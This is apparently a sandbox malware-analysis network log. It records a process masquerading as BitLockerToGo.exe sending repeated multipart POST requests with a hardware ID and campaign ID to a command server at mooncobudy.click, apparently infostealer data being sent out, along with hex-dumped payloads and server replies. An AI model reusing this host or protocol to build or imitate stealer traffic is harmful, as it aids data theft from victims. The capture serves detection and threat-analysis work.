                                                                              2025-01-07 12:19:37 UTC1369INData Raw: 78 42 46 4d 36 46 4f 64 7a 68 72 73 65 35 56 55 65 33 74 56 63 31 37 7a 45 2b 74 4a 6a 70 35 77 54 38 69 70 2b 35 68 74 35 32 65 4f 52 41 61 68 46 4d 2f 48 44 4b 55 75 30 33 74 77 58 45 68 6a 53 75 35 55 38 77 47 61 31 6e 70 47 69 2f 43 2f 6b 58 44 74 59 34 78 42 41 2b 35 65 67 63 59 53 36 48 4f 63 56 6d 35 39 56 6e 56 54 39 78 2f 2b 54 34 36 53 63 55 37 44 6f 2f 58 53 4d 61 52 72 6e 41 6c 55 6f 57 2b 43 7a 78 54 6d 59 4e 4e 44 4d 6d 77 59 66 31 53 34 54 4b 78 44 6a 5a 5a 79 52 73 65 6a 39 35 4e 7a 36 6d 75 42 51 41 54 70 53 49 37 45 48 4f 52 34 6e 46 31 34 63 46 31 38 58 2f 77 53 34 77 2f 4e 31 6e 70 53 69 2f 43 2f 76 56 6a 52 4c 71 56 7a 54 50 34 55 6c 6f 41 54 36 54 62 4c 48 48 42 32 56 48 42 58 2f 68 33 67 52 59 71 64 63 55 48 50 70 50 61 58 65 65 56
                                                                              Data Ascii: xBFM6FOdzhrse5VUe3tVc17zE+tJjp5wT8ip+5ht52eORAahFM/HDKUu03twXEhjSu5U8wGa1npGi/C/kXDtY4xBA+5egcYS6HOcVm59VnVT9x/+T46ScU7Do/XSMaRrnAlUoW+CzxTmYNNDMmwYf1S4TKxDjZZyRsej95Nz6muBQATpSI7EHOR4nF14cF18X/wS4w/N1npSi/C/vVjRLqVzTP4UloAT6TbLHHB2VHBX/h3gRYqdcUHPpPaXeeV
                                                                              2025-01-07 12:19:37 UTC898INData Raw: 75 5a 54 6e 63 34 5a 36 6e 36 62 56 58 31 78 58 58 56 65 39 42 37 74 53 49 32 59 64 51 71 46 36 50 69 4b 50 37 77 73 70 56 6b 58 38 30 79 43 34 52 6e 71 4e 6f 77 53 5a 54 56 66 64 42 69 67 56 4f 56 64 68 35 74 76 51 38 79 6d 38 4a 46 74 35 57 47 50 57 77 76 75 58 6f 6a 4d 45 75 70 77 6b 6c 6c 32 65 56 39 39 55 2f 63 59 72 41 48 44 6b 57 55 4b 6b 2b 6a 52 6d 57 7a 7a 62 34 70 43 47 76 6f 61 6b 49 34 4e 70 58 47 66 48 43 51 31 57 33 4e 54 2f 42 54 67 54 34 65 62 66 56 6a 45 72 2f 69 62 64 50 5a 6d 67 30 34 48 36 56 47 41 78 67 62 70 65 49 46 5a 62 6d 63 59 4e 68 6a 2f 44 4b 77 58 77 36 42 36 57 74 75 72 76 61 4e 70 35 33 71 50 52 41 43 68 52 63 48 5a 56 4f 4a 36 30 77 51 38 63 31 64 78 57 2f 63 56 35 55 4f 4f 6b 33 52 50 79 71 37 37 6d 48 58 6b 61 6f 4a 49
                                                                              Data Ascii: uZTnc4Z6n6bVX1xXXVe9B7tSI2YdQqF6PiKP7wspVkX80yC4RnqNowSZTVfdBigVOVdh5tvQ8ym8JFt5WGPWwvuXojMEupwkll2eV99U/cYrAHDkWUKk+jRmWzzb4pCGvoakI4NpXGfHCQ1W3NT/BTgT4ebfVjEr/ibdPZmg04H6VGAxgbpeIFZbmcYNhj/DKwXw6B6WturvaNp53qPRAChRcHZVOJ60wQ8c1dxW/cV5UOOk3RPyq77mHXkaoJI
                                                                              2025-01-07 12:19:37 UTC1369INData Raw: 33 35 31 37 0d 0a 65 42 53 68 38 41 53 37 33 4b 51 56 58 39 79 55 58 35 54 2b 78 37 6a 53 49 57 53 66 55 48 4d 70 76 6d 58 64 4f 30 73 79 67 6b 4c 2b 52 72 58 67 44 4c 47 5a 49 46 75 63 6e 5a 44 4f 45 65 32 44 61 78 49 6a 39 59 6c 43 73 43 67 38 49 42 36 37 57 53 41 51 41 7a 6c 55 49 4c 48 46 4f 42 37 6c 6c 68 79 63 56 39 34 56 50 63 54 35 45 43 48 6c 6e 49 4b 68 65 6a 34 69 6a 2b 38 4c 4b 52 43 47 73 42 55 68 4e 4a 55 2b 6a 69 4b 48 48 74 35 47 43 41 59 39 68 33 74 52 34 32 61 64 55 37 5a 71 50 53 62 63 4f 56 6a 68 45 6f 4e 36 31 4b 64 78 68 54 75 66 70 52 55 65 48 74 4b 65 56 65 34 57 71 78 49 6d 39 59 6c 43 76 71 2b 2b 4a 56 77 70 6b 57 44 55 67 33 72 57 59 54 4d 56 50 6f 34 69 68 78 37 65 52 67 67 47 50 55 59 34 55 75 52 6d 6e 31 4b 77 71 2f 31 67 48
                                                                              Data Ascii: 3517eBSh8AS73KQVX9yUX5T+x7jSIWSfUHMpvmXdO0sygkL+RrXgDLGZIFucnZDOEe2DaxIj9YlCsCg8IB67WSAQAzlUILHFOB7llhycV94VPcT5ECHlnIKhej4ij+8LKRCGsBUhNJU+jiKHHt5GCAY9h3tR42adU7ZqPSbcOVjhEoN61KdxhTufpRUeHtKeVe4WqxIm9YlCvq++JVwpkWDUg3rWYTMVPo4ihx7eRggGPUY4UuRmn1Kwq/1gH
                                                                              2025-01-07 12:19:37 UTC1369INData Raw: 52 51 62 6d 56 4a 33 42 48 75 6c 33 6c 46 74 33 5a 31 4e 71 55 2f 41 58 34 6b 65 4b 6c 6e 4e 4b 79 71 58 2f 30 6a 47 6b 61 35 77 4a 56 4b 46 2f 72 4e 63 43 37 7a 53 77 53 32 70 2f 58 33 52 4f 38 78 58 76 57 59 36 47 50 51 53 4c 75 66 69 44 50 37 78 36 6c 46 34 4c 2f 68 53 57 67 42 50 70 4e 73 73 63 64 33 70 57 64 56 50 38 48 65 6c 48 67 4a 4e 34 51 4d 65 6b 2f 70 70 32 37 6d 6d 42 54 77 62 69 56 49 44 42 47 4f 46 2f 6e 56 55 38 4f 78 68 2f 51 4c 68 4d 72 48 6d 54 6b 57 56 48 32 2b 72 4e 6b 57 37 31 65 59 6c 5a 43 71 4e 31 6a 4d 77 58 34 48 47 44 48 47 4d 37 51 54 68 66 39 46 53 30 44 34 4f 53 63 55 6e 4d 70 76 43 66 63 4f 4e 6e 69 30 4d 43 38 31 57 4b 79 42 6a 74 65 34 46 57 64 6d 64 52 63 56 58 32 48 50 35 4d 77 39 67 39 54 64 50 6f 70 39 4a 4e 37 6d 2b
                                                                              Data Ascii: RQbmVJ3BHul3lFt3Z1NqU/AX4keKlnNKyqX/0jGka5wJVKF/rNcC7zSwS2p/X3RO8xXvWY6GPQSLufiDP7x6lF4L/hSWgBPpNsscd3pWdVP8HelHgJN4QMek/pp27mmBTwbiVIDBGOF/nVU8Oxh/QLhMrHmTkWVH2+rNkW71eYlZCqN1jMwX4HGDHGM7QThf9FS0D4OScUnMpvCfcONni0MC81WKyBjte4FWdmdRcVX2HP5Mw9g9TdPop9JN7m+
                                                                              2025-01-07 12:19:37 UTC1369INData Raw: 55 4c 50 6d 46 54 51 64 5a 31 53 65 32 4e 4a 4e 58 6e 31 48 2b 42 43 6a 4a 30 39 42 49 75 75 76 38 6f 76 71 69 79 41 57 45 79 35 43 74 32 62 51 62 59 68 77 77 35 6a 4f 30 45 34 54 72 68 4d 76 67 48 44 68 44 30 53 69 2b 2f 38 67 47 33 69 62 35 4a 4b 53 39 39 6b 72 4e 63 43 37 32 33 52 65 6e 74 6b 55 57 35 56 36 69 72 53 59 59 36 58 66 6b 53 4a 6d 65 6d 66 62 2b 64 70 67 33 63 79 37 31 32 62 78 78 72 6a 64 74 4d 53 50 48 6f 59 49 47 47 34 58 4b 78 77 7a 64 5a 6c 43 70 50 6f 79 70 46 78 36 6d 75 53 57 45 48 43 54 5a 6e 4b 44 36 64 51 6c 45 31 31 59 31 56 71 47 4c 5a 55 36 67 2f 62 78 6a 4d 4b 7a 37 6d 2f 79 69 2b 32 4e 39 45 61 57 37 45 49 6b 49 34 4e 70 57 44 54 42 43 34 37 47 47 6f 59 6f 46 53 72 54 4a 47 45 65 30 6e 64 71 37 69 73 51 63 52 6e 6b 6b 67 42
                                                                              Data Ascii: ULPmFTQdZ1Se2NJNXn1H+BCjJ09BIuuv8ovqiyAWEy5Ct2bQbYhww5jO0E4TrhMvgHDhD0Si+/8gG3ib5JKS99krNcC723RentkUW5V6irSYY6XfkSJmemfb+dpg3cy712bxxrjdtMSPHoYIGG4XKxwzdZlCpPoypFx6muSWEHCTZnKD6dQlE11Y1VqGLZU6g/bxjMKz7m/yi+2N9EaW7EIkI4NpWDTBC47GGoYoFSrTJGEe0ndq7isQcRnkkgB
                                                                              2025-01-07 12:19:37 UTC1369INData Raw: 56 48 73 69 62 42 51 7a 4a 73 47 47 34 59 6f 45 61 69 44 35 48 57 4a 51 71 4d 71 2b 32 41 65 65 64 36 68 77 34 79 33 32 2b 4d 7a 68 72 69 59 4b 5a 66 62 58 5a 59 63 32 62 47 4e 65 4a 45 68 4a 70 72 64 50 57 64 2f 4a 78 78 34 33 71 56 43 55 4b 68 56 63 2b 59 4c 61 55 2b 30 32 4d 79 4e 55 41 34 41 4c 67 68 37 30 47 4e 6b 57 74 62 68 70 33 38 67 33 7a 6b 5a 38 51 48 54 4f 63 61 31 35 4a 61 70 58 4b 43 48 43 51 6c 43 69 4d 4e 71 30 4f 38 48 5a 7a 59 5a 41 72 64 36 4b 66 41 4d 61 52 2b 78 42 46 4d 70 6c 6d 64 30 68 4c 6d 59 4a 41 62 51 6b 74 2b 65 31 2f 2b 46 2b 4a 59 6b 74 52 53 53 63 43 6b 38 35 56 70 32 6c 4b 52 53 67 4c 76 58 5a 6e 52 56 4b 73 32 6e 42 77 6b 54 42 68 70 55 76 39 59 70 41 4f 53 68 58 4e 42 33 61 2b 2f 72 54 47 6b 64 4d 51 52 54 4e 52 5a 67
                                                                              Data Ascii: VHsibBQzJsGG4YoEaiD5HWJQqMq+2Aeed6hw4y32+MzhriYKZfbXZYc2bGNeJEhJprdPWd/Jxx43qVCUKhVc+YLaU+02MyNUA4ALgh70GNkWtbhp38g3zkZ8QHTOca15JapXKCHCQlCiMNq0O8HZzYZArd6KfAMaR+xBFMplmd0hLmYJAbQkt+e1/+F+JYktRSScCk85Vp2lKRSgLvXZnRVKs2nBwkTBhpUv9YpAOShXNB3a+/rTGkdMQRTNRZg


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.349930188.114.97.34437912C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-07 12:19:38 UTC279OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=1Y62FI810ZF7YOA
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 12845
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:38 UTC12845OUTData Raw: 2d 2d 31 59 36 32 46 49 38 31 30 5a 46 37 59 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 31 59 36 32 46 49 38 31 30 5a 46 37 59 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 59 36 32 46 49 38 31 30 5a 46 37 59 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a 2d 2d 31 59 36 32
                                                                              Data Ascii: --1Y62FI810ZF7YOAContent-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--1Y62FI810ZF7YOAContent-Disposition: form-data; name="pid"2--1Y62FI810ZF7YOAContent-Disposition: form-data; name="lid"Jwquln--3112YT--1Y62
                                                                              2025-01-07 12:19:40 UTC1123INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=hm1foaap4th46rt1c059gcske2; expires=Sat, 03 May 2025 06:06:18 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ujEDUJcNzQ58nfJY9X5sQic95zqJnxpScs4fnBF8CzWdmEONfVg9u8XR%2B8bRG0K7U3EBe66qPexnb1CSILWxsPlwsOESEO0PZZSgxGQU5438EMh%2BNF2ykwYsGIc9H7FgH2f"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5b75f6bf795-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1444&min_rtt=1435&rtt_var=556&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13782&delivery_rate=1937624&cwnd=187&unsent_bytes=0&cid=83079e736b927d99&ts=1483&x=0"
                                                                              2025-01-07 12:19:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-07 12:19:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.349944188.114.97.34437912C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-07 12:19:40 UTC278OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=WJMOPOOATFMWBH
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 12087
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:40 UTC12087OUTData Raw: 2d 2d 57 4a 4d 4f 50 4f 4f 41 54 46 4d 57 42 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 57 4a 4d 4f 50 4f 4f 41 54 46 4d 57 42 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4a 4d 4f 50 4f 4f 41 54 46 4d 57 42 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a 2d 2d 57 4a 4d 4f 50 4f 4f
                                                                              Data Ascii: --WJMOPOOATFMWBHContent-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--WJMOPOOATFMWBHContent-Disposition: form-data; name="pid"2--WJMOPOOATFMWBHContent-Disposition: form-data; name="lid"Jwquln--3112YT--WJMOPOO
                                                                              2025-01-07 12:19:41 UTC1132INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=m4v6i7g8uviegjljbe1b7gdhbv; expires=Sat, 03 May 2025 06:06:20 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NG9idbXh5KKlk%2Fa%2B4nitMb3ss00IDWGLy2%2Bw8vo4Fqonu3knJdC6AedPG3nLA5A5BMP%2BknKmLDGGpR6CDI32nX%2BHZVm8YF8ECQXHtOz91284KZwWdVZL%2F4VYuZ1%2FthJ96jEi"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5c47bba4366-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1566&rtt_var=599&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2841&recv_bytes=13023&delivery_rate=1810291&cwnd=200&unsent_bytes=0&cid=fcebc12ef4a2d653&ts=658&x=0"
                                                                              2025-01-07 12:19:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-07 12:19:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.349951188.114.97.34437912C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-07 12:19:42 UTC280OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=RS0CM4VYQD4PSF2G
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20445
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:42 UTC15331OUTData Raw: 2d 2d 52 53 30 43 4d 34 56 59 51 44 34 50 53 46 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 52 53 30 43 4d 34 56 59 51 44 34 50 53 46 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 53 30 43 4d 34 56 59 51 44 34 50 53 46 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a 2d 2d 52
                                                                              Data Ascii: --RS0CM4VYQD4PSF2GContent-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--RS0CM4VYQD4PSF2GContent-Disposition: form-data; name="pid"3--RS0CM4VYQD4PSF2GContent-Disposition: form-data; name="lid"Jwquln--3112YT--R
                                                                              2025-01-07 12:19:42 UTC5114OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8a 82 b9 75 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 dd 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 2b 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 75 47 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 ae 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 1d 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58
                                                                              Data Ascii: `u?sQ0u+4uG([:s~X
                                                                              2025-01-07 12:19:42 UTC1123INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=tpoqqqtk2c03hhkopcn3h4s1n6; expires=Sat, 03 May 2025 06:06:21 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToEdqivOANdXFWxHuotLCbN4FpOiMfSyk6PGPQbnRkkRhnrVV13%2F0MQcy0YMnF0S32NqIHpizYadHPuRQomIi6rfMa6LPTiHNeUUR79AXnyIepseSZUcvS1JKlKzE8%2FeAwdB"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5ccca5343b7-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=1997&rtt_var=762&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21405&delivery_rate=1423695&cwnd=238&unsent_bytes=0&cid=98bd7e2abeeadd70&ts=621&x=0"
                                                                              2025-01-07 12:19:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-07 12:19:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.349963188.114.97.34437912C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-07 12:19:43 UTC280OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=JF9DUC2BWPQ1ZFPQO
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1231
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:43 UTC1231OUTData Raw: 2d 2d 4a 46 39 44 55 43 32 42 57 50 51 31 5a 46 50 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4a 46 39 44 55 43 32 42 57 50 51 31 5a 46 50 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 46 39 44 55 43 32 42 57 50 51 31 5a 46 50 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a
                                                                              Data Ascii: --JF9DUC2BWPQ1ZFPQOContent-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--JF9DUC2BWPQ1ZFPQOContent-Disposition: form-data; name="pid"1--JF9DUC2BWPQ1ZFPQOContent-Disposition: form-data; name="lid"Jwquln--3112YT
                                                                              2025-01-07 12:19:44 UTC1122INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=62da4iv4940o8brt7g5mu9kh4i; expires=Sat, 03 May 2025 06:06:23 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FRI4FxIbRRGbPWKqHPWaG41IQkHXMF0AeqxQjidt3uYCvOY69X84yf9hUPHgqCWaM5gBmHf7QVj7S5fpcTcnYkggj10kTcVuA1MDE%2BWYZC5yGn%2Be%2BgxUlZbO11QSPphnTz0R"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5d70a9d7ca5-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1755&rtt_var=683&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2147&delivery_rate=1574123&cwnd=243&unsent_bytes=0&cid=ef7a29fe50174743&ts=497&x=0"
                                                                              2025-01-07 12:19:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-07 12:19:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.349973188.114.97.34437912C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-07 12:19:45 UTC274OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=GVWKJB737
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 562220
                                                                              Host: mooncobudy.click
